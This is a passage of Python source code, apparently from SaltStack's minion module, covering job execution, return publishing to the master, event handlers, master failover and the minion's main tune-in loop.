minion_instance.functions.pack['__context__']['retcode'] = 0
if isinstance(executors, six.string_types):
executors = [executors]
elif not isinstance(executors, list) or not executors:
raise SaltInvocationError("Wrong executors specification: {0}. String or non-empty list expected".
format(executors))
if opts.get('sudo_user', '') and executors[-1] != 'sudo':
executors[-1] = 'sudo' # replace the last one with sudo
log.trace('Executors list %s', executors) # pylint: disable=no-member
for name in executors:
fname = '{0}.execute'.format(name)
if fname not in minion_instance.executors:
raise SaltInvocationError("Executor '{0}' is not available".format(name))
return_data = minion_instance.executors[fname](opts, data, func, args, kwargs)
if return_data is not None:
break
if isinstance(return_data, types.GeneratorType):
ind = 0
iret = {}
for single in return_data:
if isinstance(single, dict) and isinstance(iret, dict):
iret.update(single)
else:
if not iret:
iret = []
iret.append(single)
tag = tagify([data['jid'], 'prog', opts['id'], six.text_type(ind)], 'job')
event_data = {'return': single}
minion_instance._fire_master(event_data, tag)
ind += 1
ret['return'] = iret
else:
ret['return'] = return_data
retcode = minion_instance.functions.pack['__context__'].get(
'retcode',
salt.defaults.exitcodes.EX_OK
)
if retcode == salt.defaults.exitcodes.EX_OK:
# No nonzero retcode in __context__ dunder. Check if return
# is a dictionary with a "result" or "success" key.
try:
func_result = all(return_data.get(x, True)
for x in ('result', 'success'))
except Exception:
# return data is not a dict
func_result = True
if not func_result:
retcode = salt.defaults.exitcodes.EX_GENERIC
ret['retcode'] = retcode
ret['success'] = retcode == salt.defaults.exitcodes.EX_OK
except CommandNotFoundError as exc:
msg = 'Command required for \'{0}\' not found'.format(
function_name
)
log.debug(msg, exc_info=True)
ret['return'] = '{0}: {1}'.format(msg, exc)
ret['out'] = 'nested'
ret['retcode'] = salt.defaults.exitcodes.EX_GENERIC
except CommandExecutionError as exc:
log.error(
'A command in \'%s\' had a problem: %s',
function_name, exc,
exc_info_on_loglevel=logging.DEBUG
)
ret['return'] = 'ERROR: {0}'.format(exc)
ret['out'] = 'nested'
ret['retcode'] = salt.defaults.exitcodes.EX_GENERIC
except SaltInvocationError as exc:
log.error(
'Problem executing \'%s\': %s',
function_name, exc,
exc_info_on_loglevel=logging.DEBUG
)
ret['return'] = 'ERROR executing \'{0}\': {1}'.format(
function_name, exc
)
ret['out'] = 'nested'
ret['retcode'] = salt.defaults.exitcodes.EX_GENERIC
except TypeError as exc:
msg = 'Passed invalid arguments to {0}: {1}\n{2}'.format(
function_name, exc, func.__doc__ or ''
)
log.warning(msg, exc_info_on_loglevel=logging.DEBUG)
ret['return'] = msg
ret['out'] = 'nested'
ret['retcode'] = salt.defaults.exitcodes.EX_GENERIC
except Exception:
msg = 'The minion function caused an exception'
log.warning(msg, exc_info_on_loglevel=True)
salt.utils.error.fire_exception(salt.exceptions.MinionError(msg), opts, job=data)
ret['return'] = '{0}: {1}'.format(msg, traceback.format_exc())
ret['out'] = 'nested'
ret['retcode'] = salt.defaults.exitcodes.EX_GENERIC
else:
docs = minion_instance.functions['sys.doc']('{0}*'.format(function_name))
if docs:
docs[function_name] = minion_instance.functions.missing_fun_string(function_name)
ret['return'] = docs
else:
ret['return'] = minion_instance.functions.missing_fun_string(function_name)
mod_name = function_name.split('.')[0]
if mod_name in minion_instance.function_errors:
ret['return'] += ' Possible reasons: \'{0}\''.format(
minion_instance.function_errors[mod_name]
)
ret['success'] = False
ret['retcode'] = salt.defaults.exitcodes.EX_GENERIC
ret['out'] = 'nested'
ret['jid'] = data['jid']
ret['fun'] = data['fun']
ret['fun_args'] = data['arg']
if 'master_id' in data:
ret['master_id'] = data['master_id']
if 'metadata' in data:
if isinstance(data['metadata'], dict):
ret['metadata'] = data['metadata']
else:
log.warning('The metadata parameter must be a dictionary. Ignoring.')
if minion_instance.connected:
minion_instance._return_pub(
ret,
timeout=minion_instance._return_retry_timer()
)
# Add default returners from minion config
# Should have been coverted to comma-delimited string already
if isinstance(opts.get('return'), six.string_types):
if data['ret']:
data['ret'] = ','.join((data['ret'], opts['return']))
else:
data['ret'] = opts['return']
log.debug('minion return: %s', ret)
# TODO: make a list? Seems odd to split it this late :/
if data['ret'] and isinstance(data['ret'], six.string_types):
if 'ret_config' in data:
ret['ret_config'] = data['ret_config']
if 'ret_kwargs' in data:
ret['ret_kwargs'] = data['ret_kwargs']
ret['id'] = opts['id']
for returner in set(data['ret'].split(',')):
try:
returner_str = '{0}.returner'.format(returner)
if returner_str in minion_instance.returners:
minion_instance.returners[returner_str](ret)
else:
returner_err = minion_instance.returners.missing_fun_string(returner_str)
log.error(
'Returner %s could not be loaded: %s',
returner_str, returner_err
)
except Exception as exc:
log.exception(
'The return failed for job %s: %s', data['jid'], exc
)
@classmethod
def _thread_multi_return(cls, minion_instance, opts, data):
'''
This method should be used as a threading target, start the actual
minion side execution.
'''
fn_ = os.path.join(minion_instance.proc_dir, data['jid'])
if opts['multiprocessing'] and not salt.utils.platform.is_windows():
# Shutdown the multiprocessing before daemonizing
salt.log.setup.shutdown_multiprocessing_logging()
salt.utils.process.daemonize_if(opts)
# Reconfigure multiprocessing logging after daemonizing
salt.log.setup.setup_multiprocessing_logging()
salt.utils.process.appendproctitle('{0}._thread_multi_return {1}'.format(cls.__name__, data['jid']))
sdata = {'pid': os.getpid()}
sdata.update(data)
log.info('Starting a new job with PID %s', sdata['pid'])
with salt.utils.files.fopen(fn_, 'w+b') as fp_:
fp_.write(minion_instance.serial.dumps(sdata))
multifunc_ordered = opts.get('multifunc_ordered', False)
num_funcs = len(data['fun'])
if multifunc_ordered:
ret = {
'return': [None] * num_funcs,
'retcode': [None] * num_funcs,
'success': [False] * num_funcs
}
else:
ret = {
'return': {},
'retcode': {},
'success': {}
}
for ind in range(0, num_funcs):
if not multifunc_ordered:
ret['success'][data['fun'][ind]] = False
try:
minion_blackout_violation = False
if minion_instance.connected and minion_instance.opts['pillar'].get('minion_blackout', False):
whitelist = minion_instance.opts['pillar'].get('minion_blackout_whitelist', [])
# this minion is blacked out. Only allow saltutil.refresh_pillar and the whitelist
if data['fun'][ind] != 'saltutil.refresh_pillar' and data['fun'][ind] not in whitelist:
minion_blackout_violation = True
elif minion_instance.opts['grains'].get('minion_blackout', False):
whitelist = minion_instance.opts['grains'].get('minion_blackout_whitelist', [])
if data['fun'][ind] != 'saltutil.refresh_pillar' and data['fun'][ind] not in whitelist:
minion_blackout_violation = True
if minion_blackout_violation:
raise SaltInvocationError('Minion in blackout mode. Set \'minion_blackout\' '
'to False in pillar or grains to resume operations. Only '
'saltutil.refresh_pillar allowed in blackout mode.')
func = minion_instance.functions[data['fun'][ind]]
args, kwargs = load_args_and_kwargs(
func,
data['arg'][ind],
data)
minion_instance.functions.pack['__context__']['retcode'] = 0
key = ind if multifunc_ordered else data['fun'][ind]
ret['return'][key] = func(*args, **kwargs)
retcode = minion_instance.functions.pack['__context__'].get(
'retcode',
0
)
if retcode == 0:
# No nonzero retcode in __context__ dunder. Check if return
# is a dictionary with a "result" or "success" key.
try:
func_result = all(ret['return'][key].get(x, True)
for x in ('result', 'success'))
except Exception:
# return data is not a dict
func_result = True
if not func_result:
retcode = 1
ret['retcode'][key] = retcode
ret['success'][key] = retcode == 0
except Exception as exc:
trb = traceback.format_exc()
log.warning('The minion function caused an exception: %s', exc)
if multifunc_ordered:
ret['return'][ind] = trb
else:
ret['return'][data['fun'][ind]] = trb
ret['jid'] = data['jid']
ret['fun'] = data['fun']
ret['fun_args'] = data['arg']
if 'metadata' in data:
ret['metadata'] = data['metadata']
if minion_instance.connected:
minion_instance._return_pub(
ret,
timeout=minion_instance._return_retry_timer()
)
if data['ret']:
if 'ret_config' in data:
ret['ret_config'] = data['ret_config']
if 'ret_kwargs' in data:
ret['ret_kwargs'] = data['ret_kwargs']
for returner in set(data['ret'].split(',')):
ret['id'] = opts['id']
try:
minion_instance.returners['{0}.returner'.format(
returner
)](ret)
except Exception as exc:
log.error(
'The return failed for job %s: %s',
data['jid'], exc
)
def _return_pub(self, ret, ret_cmd='_return', timeout=60, sync=True):
'''
Return the data from the executed command to the master server
'''
jid = ret.get('jid', ret.get('__jid__'))
fun = ret.get('fun', ret.get('__fun__'))
if self.opts['multiprocessing']:
fn_ = os.path.join(self.proc_dir, jid)
if os.path.isfile(fn_):
try:
os.remove(fn_)
except (OSError, IOError):
# The file is gone already
pass
log.info('Returning information for job: %s', jid)
log.trace('Return data: %s', ret)
if ret_cmd == '_syndic_return':
load = {'cmd': ret_cmd,
'id': self.opts['uid'],
'jid': jid,
'fun': fun,
'arg': ret.get('arg'),
'tgt': ret.get('tgt'),
'tgt_type': ret.get('tgt_type'),
'load': ret.get('__load__')}
if '__master_id__' in ret:
load['master_id'] = ret['__master_id__']
load['return'] = {}
for key, value in six.iteritems(ret):
if key.startswith('__'):
continue
load['return'][key] = value
else:
load = {'cmd': ret_cmd,
'id': self.opts['id']}
for key, value in six.iteritems(ret):
load[key] = value
if 'out' in ret:
if isinstance(ret['out'], six.string_types):
load['out'] = ret['out']
else:
log.error(
'Invalid outputter %s. This is likely a bug.',
ret['out']
)
else:
try:
oput = self.functions[fun].__outputter__
except (KeyError, AttributeError, TypeError):
pass
else:
if isinstance(oput, six.string_types):
load['out'] = oput
if self.opts['cache_jobs']:
# Local job cache has been enabled
if ret['jid'] == 'req':
ret['jid'] = salt.utils.jid.gen_jid(self.opts)
salt.utils.minion.cache_jobs(self.opts, ret['jid'], ret)
if not self.opts['pub_ret']:
return ''
def timeout_handler(*_):
log.warning(
'The minion failed to return the job information for job %s. '
'This is often due to the master being shut down or '
'overloaded. If the master is running, consider increasing '
'the worker_threads value.', jid
)
return True
if sync:
try:
ret_val = self._send_req_sync(load, timeout=timeout)
except SaltReqTimeoutError:
timeout_handler()
return ''
else:
with tornado.stack_context.ExceptionStackContext(timeout_handler):
ret_val = self._send_req_async(load, timeout=timeout, callback=lambda f: None) # pylint: disable=unexpected-keyword-arg
log.trace('ret_val = %s', ret_val) # pylint: disable=no-member
return ret_val
def _return_pub_multi(self, rets, ret_cmd='_return', timeout=60, sync=True):
'''
Return the data from the executed command to the master server
'''
if not isinstance(rets, list):
rets = [rets]
jids = {}
for ret in rets:
jid = ret.get('jid', ret.get('__jid__'))
fun = ret.get('fun', ret.get('__fun__'))
if self.opts['multiprocessing']:
fn_ = os.path.join(self.proc_dir, jid)
if os.path.isfile(fn_):
try:
os.remove(fn_)
except (OSError, IOError):
# The file is gone already
pass
log.info('Returning information for job: %s', jid)
load = jids.setdefault(jid, {})
if ret_cmd == '_syndic_return':
if not load:
load.update({'id': self.opts['id'],
'jid': jid,
'fun': fun,
'arg': ret.get('arg'),
'tgt': ret.get('tgt'),
'tgt_type': ret.get('tgt_type'),
'load': ret.get('__load__'),
'return': {}})
if '__master_id__' in ret:
load['master_id'] = ret['__master_id__']
for key, value in six.iteritems(ret):
if key.startswith('__'):
continue
load['return'][key] = value
else:
load.update({'id': self.opts['id']})
for key, value in six.iteritems(ret):
load[key] = value
if 'out' in ret:
if isinstance(ret['out'], six.string_types):
load['out'] = ret['out']
else:
log.error(
'Invalid outputter %s. This is likely a bug.',
ret['out']
)
else:
try:
oput = self.functions[fun].__outputter__
except (KeyError, AttributeError, TypeError):
pass
else:
if isinstance(oput, six.string_types):
load['out'] = oput
if self.opts['cache_jobs']:
# Local job cache has been enabled
salt.utils.minion.cache_jobs(self.opts, load['jid'], ret)
load = {'cmd': ret_cmd,
'load': list(six.itervalues(jids))}
def timeout_handler(*_):
log.warning(
'The minion failed to return the job information for job %s. '
'This is often due to the master being shut down or '
'overloaded. If the master is running, consider increasing '
'the worker_threads value.', jid
)
return True
if sync:
try:
ret_val = self._send_req_sync(load, timeout=timeout)
except SaltReqTimeoutError:
timeout_handler()
return ''
else:
with tornado.stack_context.ExceptionStackContext(timeout_handler):
ret_val = self._send_req_async(load, timeout=timeout, callback=lambda f: None) # pylint: disable=unexpected-keyword-arg
log.trace('ret_val = %s', ret_val) # pylint: disable=no-member
return ret_val
def _state_run(self):
'''
Execute a state run based on information set in the minion config file
'''
if self.opts['startup_states']:
if self.opts.get('master_type', 'str') == 'disable' and \
self.opts.get('file_client', 'remote') == 'remote':
log.warning(
'Cannot run startup_states when \'master_type\' is set '
'to \'disable\' and \'file_client\' is set to '
'\'remote\'. Skipping.'
)
else:
data = {'jid': 'req', 'ret': self.opts.get('ext_job_cache', '')}
if self.opts['startup_states'] == 'sls':
data['fun'] = 'state.sls'
data['arg'] = [self.opts['sls_list']]
elif self.opts['startup_states'] == 'top':
data['fun'] = 'state.top'
data['arg'] = [self.opts['top_file']]
else:
data['fun'] = 'state.highstate'
data['arg'] = []
self._handle_decoded_payload(data)
def _refresh_grains_watcher(self, refresh_interval_in_minutes):
'''
Create a loop that will fire a pillar refresh to inform a master about a change in the grains of this minion
:param refresh_interval_in_minutes:
:return: None
'''
if '__update_grains' not in self.opts.get('schedule', {}):
if 'schedule' not in self.opts:
self.opts['schedule'] = {}
self.opts['schedule'].update({
'__update_grains':
{
'function': 'event.fire',
'args': [{}, 'grains_refresh'],
'minutes': refresh_interval_in_minutes
}
})
def _fire_master_minion_start(self):
# Send an event to the master that the minion is live
if self.opts['enable_legacy_startup_events']:
# Old style event. Defaults to False in Sodium release.
self._fire_master(
'Minion {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
'minion_start'
)
# send name spaced event
self._fire_master(
'Minion {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
tagify([self.opts['id'], 'start'], 'minion'),
)
def module_refresh(self, force_refresh=False, notify=False):
'''
Refresh the functions and returners.
'''
log.debug('Refreshing modules. Notify=%s', notify)
self.functions, self.returners, _, self.executors = self._load_modules(force_refresh, notify=notify)
self.schedule.functions = self.functions
self.schedule.returners = self.returners
def beacons_refresh(self):
'''
Refresh the functions and returners.
'''
log.debug('Refreshing beacons.')
self.beacons = salt.beacons.Beacon(self.opts, self.functions)
def matchers_refresh(self):
'''
Refresh the matchers
'''
log.debug('Refreshing matchers.')
self.matchers = salt.loader.matchers(self.opts)
# TODO: only allow one future in flight at a time?
@tornado.gen.coroutine
def pillar_refresh(self, force_refresh=False, notify=False):
'''
Refresh the pillar
'''
if self.connected:
log.debug('Refreshing pillar. Notify: %s', notify)
async_pillar = salt.pillar.get_async_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
self.opts['saltenv'],
pillarenv=self.opts.get('pillarenv'),
)
try:
self.opts['pillar'] = yield async_pillar.compile_pillar()
if notify:
evt = salt.utils.event.get_event('minion', opts=self.opts, listen=False)
evt.fire_event({'complete': True}, tag=salt.defaults.events.MINION_PILLAR_COMPLETE)
except SaltClientError:
# Do not exit if a pillar refresh fails.
log.error('Pillar data could not be refreshed. '
'One or more masters may be down!')
finally:
async_pillar.destroy()
self.module_refresh(force_refresh, notify)
self.matchers_refresh()
self.beacons_refresh()
def manage_schedule(self, tag, data):
'''
Refresh the functions and returners.
'''
func = data.get('func', None)
name = data.get('name', None)
schedule = data.get('schedule', None)
where = data.get('where', None)
persist = data.get('persist', None)
funcs = {'delete': ('delete_job', (name, persist)),
'add': ('add_job', (schedule, persist)),
'modify': ('modify_job',
(name, schedule, persist)),
'enable': ('enable_schedule', ()),
'disable': ('disable_schedule', ()),
'enable_job': ('enable_job', (name, persist)),
'disable_job': ('disable_job', (name, persist)),
'postpone_job': ('postpone_job', (name, data)),
'skip_job': ('skip_job', (name, data)),
'reload': ('reload', (schedule)),
'list': ('list', (where)),
'save_schedule': ('save_schedule', ()),
'get_next_fire_time': ('get_next_fire_time',
(name))}
# Call the appropriate schedule function
try:
alias, params = funcs.get(func)
getattr(self.schedule, alias)(*params)
except TypeError:
log.error('Function "%s" is unavailable in salt.utils.scheduler',
func)
def manage_beacons(self, tag, data):
'''
Manage Beacons
'''
func = data.get('func', None)
name = data.get('name', None)
beacon_data = data.get('beacon_data', None)
include_pillar = data.get('include_pillar', None)
include_opts = data.get('include_opts', None)
funcs = {'add': ('add_beacon', (name, beacon_data)),
'modify': ('modify_beacon', (name, beacon_data)),
'delete': ('delete_beacon', (name,)),
'enable': ('enable_beacons', ()),
'disable': ('disable_beacons', ()),
'enable_beacon': ('enable_beacon', (name,)),
'disable_beacon': ('disable_beacon', (name,)),
'list': ('list_beacons', (include_opts,
include_pillar)),
'list_available': ('list_available_beacons', ()),
'validate_beacon': ('validate_beacon', (name,
beacon_data)),
'reset': ('reset', ())}
# Call the appropriate beacon function
try:
alias, params = funcs.get(func)
getattr(self.beacons, alias)(*params)
except AttributeError:
log.error('Function "%s" is unavailable in salt.beacons', func)
except TypeError as exc:
log.info(
'Failed to handle %s with data(%s). Error: %s',
tag, data, exc,
exc_info_on_loglevel=logging.DEBUG
)
def environ_setenv(self, tag, data):
'''
Set the salt-minion main process environment according to
the data contained in the minion event data
'''
environ = data.get('environ', None)
if environ is None:
return False
false_unsets = data.get('false_unsets', False)
clear_all = data.get('clear_all', False)
import salt.modules.environ as mod_environ
return mod_environ.setenv(environ, false_unsets, clear_all)
def _pre_tune(self):
'''
Set the minion running flag and issue the appropriate warnings if
the minion cannot be started or is already running
'''
if self._running is None:
self._running = True
elif self._running is False:
log.error(
'This %s was scheduled to stop. Not running %s.tune_in()',
self.__class__.__name__, self.__class__.__name__
)
return
elif self._running is True:
log.error(
'This %s is already running. Not running %s.tune_in()',
self.__class__.__name__, self.__class__.__name__
)
return
try:
log.info(
'%s is starting as user \'%s\'',
self.__class__.__name__, salt.utils.user.get_user()
)
except Exception as err:
# Only windows is allowed to fail here. See #3189. Log as debug in
# that case. Else, error.
log.log(
salt.utils.platform.is_windows() and logging.DEBUG or logging.ERROR,
'Failed to get the user who is starting %s',
self.__class__.__name__,
exc_info=err
)
def _mine_send(self, tag, data):
'''
Send mine data to the master
'''
channel = salt.transport.client.ReqChannel.factory(self.opts)
data['tok'] = self.tok
try:
ret = channel.send(data)
return ret
except SaltReqTimeoutError:
log.warning('Unable to send mine data to master.')
return None
finally:
channel.close()
def _handle_tag_module_refresh(self, tag, data):
'''
Handle a module_refresh event
'''
self.module_refresh(
force_refresh=data.get('force_refresh', False),
notify=data.get('notify', False)
)
@tornado.gen.coroutine
def _handle_tag_pillar_refresh(self, tag, data):
'''
Handle a pillar_refresh event
'''
yield self.pillar_refresh(
force_refresh=data.get('force_refresh', False),
notify=data.get('notify', False)
)
def _handle_tag_beacons_refresh(self, tag, data):
'''
Handle a beacon_refresh event
'''
self.beacons_refresh()
def _handle_tag_matchers_refresh(self, tag, data):
'''
Handle a matchers_refresh event
'''
self.matchers_refresh()
def _handle_tag_manage_schedule(self, tag, data):
'''
Handle a manage_schedule event
'''
self.manage_schedule(tag, data)
def _handle_tag_manage_beacons(self, tag, data):
'''
Handle a manage_beacons event
'''
self.manage_beacons(tag, data)
def _handle_tag_grains_refresh(self, tag, data):
'''
Handle a grains_refresh event
'''
if (data.get('force_refresh', False) or
self.grains_cache != self.opts['grains']):
self.pillar_refresh(force_refresh=True)
self.grains_cache = self.opts['grains']
def _handle_tag_environ_setenv(self, tag, data):
'''
Handle a environ_setenv event
'''
self.environ_setenv(tag, data)
def _handle_tag_minion_mine(self, tag, data):
'''
Handle a _minion_mine event
'''
self._mine_send(tag, data)
def _handle_tag_fire_master(self, tag, data):
'''
Handle a fire_master event
'''
if self.connected:
log.debug('Forwarding master event tag=%s', data['tag'])
self._fire_master(data['data'], data['tag'], data['events'], data['pretag'])
def _handle_tag_master_disconnected_failback(self, tag, data):
'''
Handle a master_disconnected_failback event
'''
# if the master disconnect event is for a different master, raise an exception
if tag.startswith(master_event(type='disconnected')) and data['master'] != self.opts['master']:
# not mine master, ignore
return
if tag.startswith(master_event(type='failback')):
# if the master failback event is not for the top master, raise an exception
if data['master'] != self.opts['master_list'][0]:
raise SaltException('Bad master \'{0}\' when mine failback is \'{1}\''.format(
data['master'], self.opts['master']))
# if the master failback event is for the current master, raise an exception
elif data['master'] == self.opts['master'][0]:
raise SaltException('Already connected to \'{0}\''.format(data['master']))
if self.connected:
# we are not connected anymore
self.connected = False
log.info('Connection to master %s lost', self.opts['master'])
# we can't use the config default here because the default '0' value is overloaded
# to mean 'if 0 disable the job', but when salt detects a timeout it also sets up
# these jobs
master_alive_interval = self.opts['master_alive_interval'] or 60
if self.opts['master_type'] != 'failover':
# modify the scheduled job to fire on reconnect
if self.opts['transport'] != 'tcp':
schedule = {
'function': 'status.master',
'seconds': master_alive_interval,
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master'],
'connected': False}
}
self.schedule.modify_job(name=master_event(type='alive', master=self.opts['master']),
schedule=schedule)
else:
# delete the scheduled job to don't interfere with the failover process
if self.opts['transport'] != 'tcp':
self.schedule.delete_job(name=master_event(type='alive', master=self.opts['master']),
persist=True)
log.info('Trying to tune in to next master from master-list')
if hasattr(self, 'pub_channel'):
self.pub_channel.on_recv(None)
if hasattr(self.pub_channel, 'auth'):
self.pub_channel.auth.invalidate()
if hasattr(self.pub_channel, 'close'):
self.pub_channel.close()
del self.pub_channel
# if eval_master finds a new master for us, self.connected
# will be True again on successful master authentication
try:
master, self.pub_channel = yield self.eval_master(
opts=self.opts,
failed=True,
failback=tag.startswith(master_event(type='failback')))
except SaltClientError:
pass
if self.connected:
self.opts['master'] = master
# re-init the subsystems to work with the new master
log.info(
'Re-initialising subsystems for new master %s',
self.opts['master']
)
# put the current schedule into the new loaders
self.opts['schedule'] = self.schedule.option('schedule')
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
# make the schedule to use the new 'functions' loader
self.schedule.functions = self.functions
self.pub_channel.on_recv(self._handle_payload)
self._fire_master_minion_start()
log.info('Minion is ready to receive requests!')
# update scheduled job to run with the new master addr
if self.opts['transport'] != 'tcp':
schedule = {
'function': 'status.master',
'seconds': master_alive_interval,
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master'],
'connected': True}
}
self.schedule.modify_job(name=master_event(type='alive', master=self.opts['master']),
schedule=schedule)
if self.opts['master_failback'] and 'master_list' in self.opts:
if self.opts['master'] != self.opts['master_list'][0]:
schedule = {
'function': 'status.ping_master',
'seconds': self.opts['master_failback_interval'],
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master_list'][0]}
}
self.schedule.modify_job(name=master_event(type='failback'),
schedule=schedule)
else:
self.schedule.delete_job(name=master_event(type='failback'), persist=True)
else:
self.restart = True
self.io_loop.stop()
def _handle_tag_master_connected(self, tag, data):
'''
Handle a master_connected event
'''
# handle this event only once. otherwise it will pollute the log
# also if master type is failover all the reconnection work is done
# by `disconnected` event handler and this event must never happen,
# anyway check it to be sure
if not self.connected and self.opts['master_type'] != 'failover':
log.info('Connection to master %s re-established', self.opts['master'])
self.connected = True
# modify the __master_alive job to only fire,
# if the connection is lost again
if self.opts['transport'] != 'tcp':
if self.opts['master_alive_interval'] > 0:
schedule = {
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master'],
'connected': True}
}
self.schedule.modify_job(name=master_event(type='alive', master=self.opts['master']),
schedule=schedule)
else:
self.schedule.delete_job(name=master_event(type='alive', master=self.opts['master']), persist=True)
def _handle_tag_schedule_return(self, tag, data):
'''
Handle a _schedule_return event
'''
# reporting current connection with master
if data['schedule'].startswith(master_event(type='alive', master='')):
if data['return']:
log.debug(
'Connected to master %s',
data['schedule'].split(master_event(type='alive', master=''))[1]
)
self._return_pub(data, ret_cmd='_return', sync=False)
def _handle_tag_salt_error(self, tag, data):
'''
Handle a _salt_error event
'''
if self.connected:
log.debug('Forwarding salt error event tag=%s', tag)
self._fire_master(data, tag)
def _handle_tag_salt_auth_creds(self, tag, data):
'''
Handle a salt_auth_creds event
'''
key = tuple(data['key'])
log.debug(
'Updating auth data for %s: %s -> %s',
key, salt.crypt.AsyncAuth.creds_map.get(key), data['creds']
)
salt.crypt.AsyncAuth.creds_map[tuple(data['key'])] = data['creds']
@tornado.gen.coroutine
def handle_event(self, package):
'''
Handle an event from the epull_sock (all local minion events)
'''
if not self.ready:
raise tornado.gen.Return()
tag, data = salt.utils.event.SaltEvent.unpack(package)
log.debug(
'Minion of \'%s\' is handling event tag \'%s\'',
self.opts['master'], tag
)
tag_functions = {
'beacons_refresh': self._handle_tag_beacons_refresh,
'environ_setenv': self._handle_tag_environ_setenv,
'fire_master': self._handle_tag_fire_master,
'grains_refresh': self._handle_tag_grains_refresh,
'matchers_refresh': self._handle_tag_matchers_refresh,
'manage_schedule': self._handle_tag_manage_schedule,
'manage_beacons': self._handle_tag_manage_beacons,
'_minion_mine': self._handle_tag_minion_mine,
'module_refresh': self._handle_tag_module_refresh,
'pillar_refresh': self._handle_tag_pillar_refresh,
'salt/auth/creds': self._handle_tag_salt_auth_creds,
'_salt_error': self._handle_tag_salt_error,
'__schedule_return': self._handle_tag_schedule_return,
master_event(type='disconnected'): self._handle_tag_master_disconnected_failback,
master_event(type='failback'): self._handle_tag_master_disconnected_failback,
master_event(type='connected'): self._handle_tag_master_connected,
}
# Run the appropriate function
for tag_function in tag_functions:
if tag.startswith(tag_function):
tag_functions[tag_function](tag, data)
def _fallback_cleanups(self):
'''
Fallback cleanup routines, attempting to fix leaked processes, threads, etc.
'''
# Add an extra fallback in case a forked process leaks through
multiprocessing.active_children()
# Cleanup Windows threads
if not salt.utils.platform.is_windows():
return
for thread in self.win_proc:
if not thread.is_alive():
thread.join()
try:
self.win_proc.remove(thread)
del thread
except (ValueError, NameError):
pass
def _setup_core(self):
'''
Set up the core minion attributes.
This is safe to call multiple times.
'''
if not self.ready:
# First call. Initialize.
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
self.serial = salt.payload.Serial(self.opts)
self.mod_opts = self._prep_mod_opts()
# self.matcher = Matcher(self.opts, self.functions)
self.matchers = salt.loader.matchers(self.opts)
self.beacons = salt.beacons.Beacon(self.opts, self.functions)
uid = salt.utils.user.get_uid(user=self.opts.get('user', None))
self.proc_dir = get_proc_dir(self.opts['cachedir'], uid=uid)
self.grains_cache = self.opts['grains']
self.ready = True
def setup_beacons(self, before_connect=False):
'''
Set up the beacons.
This is safe to call multiple times.
'''
self._setup_core()
loop_interval = self.opts['loop_interval']
new_periodic_callbacks = {}
if 'beacons' not in self.periodic_callbacks:
self.beacons = salt.beacons.Beacon(self.opts, self.functions)
def handle_beacons():
# Process Beacons
beacons = None
try:
beacons = self.process_beacons(self.functions)
except Exception:
log.critical('The beacon errored: ', exc_info=True)
if beacons and self.connected:
self._fire_master(events=beacons)
new_periodic_callbacks['beacons'] = tornado.ioloop.PeriodicCallback(
handle_beacons, loop_interval * 1000)
if before_connect:
# Make sure there is a chance for one iteration to occur before connect
handle_beacons()
if 'cleanup' not in self.periodic_callbacks:
new_periodic_callbacks['cleanup'] = tornado.ioloop.PeriodicCallback(
self._fallback_cleanups, loop_interval * 1000)
# start all the other callbacks
for periodic_cb in six.itervalues(new_periodic_callbacks):
periodic_cb.start()
self.periodic_callbacks.update(new_periodic_callbacks)
def setup_scheduler(self, before_connect=False):
'''
Set up the scheduler.
This is safe to call multiple times.
'''
self._setup_core()
loop_interval = self.opts['loop_interval']
new_periodic_callbacks = {}
if 'schedule' not in self.periodic_callbacks:
if 'schedule' not in self.opts:
self.opts['schedule'] = {}
if not hasattr(self, 'schedule'):
self.schedule = salt.utils.schedule.Schedule(
self.opts,
self.functions,
self.returners,
utils=self.utils,
cleanup=[master_event(type='alive')])
try:
if self.opts['grains_refresh_every']: # In minutes, not seconds!
log.debug(
'Enabling the grains refresher. Will run every %d minute(s).',
self.opts['grains_refresh_every']
)
self._refresh_grains_watcher(abs(self.opts['grains_refresh_every']))
except Exception as exc:
log.error(
'Exception occurred in attempt to initialize grain refresh '
'routine during minion tune-in: %s', exc
)
# TODO: actually listen to the return and change period
def handle_schedule():
self.process_schedule(self, loop_interval)
new_periodic_callbacks['schedule'] = tornado.ioloop.PeriodicCallback(handle_schedule, 1000)
if before_connect:
# Make sure there is a chance for one iteration to occur before connect
handle_schedule()
if 'cleanup' not in self.periodic_callbacks:
new_periodic_callbacks['cleanup'] = tornado.ioloop.PeriodicCallback(
self._fallback_cleanups, loop_interval * 1000)
# start all the other callbacks
for periodic_cb in six.itervalues(new_periodic_callbacks):
periodic_cb.start()
self.periodic_callbacks.update(new_periodic_callbacks)
# Main Minion Tune In
def tune_in(self, start=True):
'''
Lock onto the publisher. This is the main event loop for the minion
:rtype : None
'''
self._pre_tune()
log.debug('Minion \'%s\' trying to tune in', self.opts['id'])
if start:
if self.opts.get('beacons_before_connect', False):
self.setup_beacons(before_connect=True)
if self.opts.get('scheduler_before_connect', False):
self.setup_scheduler(before_connect=True)
self.sync_connect_master()
if self.connected:
self._fire_master_minion_start()
log.info('Minion is ready to receive requests!')
# Make sure to gracefully handle SIGUSR1
enable_sigusr1_handler()
# Make sure to gracefully handle CTRL_LOGOFF_EVENT
if HAS_WIN_FUNCTIONS:
salt.utils.win_functions.enable_ctrl_logoff_handler()
# On first startup execute a state run if configured to do so
self._state_run()
self.setup_beacons()
self.setup_scheduler()
# schedule the stuff that runs every interval
ping_interval = self.opts.get('ping_interval', 0) * 60
if ping_interval > 0 and self.connected:
def ping_master():
try:
def ping_timeout_handler(*_):
if self.opts.get('auth_safemode', False):
log.error('** Master Ping failed. Attempting to restart minion**')
delay = self.opts.get('random_reauth_delay', 5)
log.info('delaying random_reauth_delay %ss', delay)
try:
self.functions['service.restart'](service_name())
except KeyError:
# Probably no init system (running in docker?)
log.warning(
'ping_interval reached without response '
'from the master, but service.restart '
'could not be run to restart the minion '
'daemon. ping_interval requires that the '
'minion is running under an init system.'
)
self._fire_master('ping', 'minion_ping', sync=False, timeout_handler=ping_timeout_handler)
except Exception:
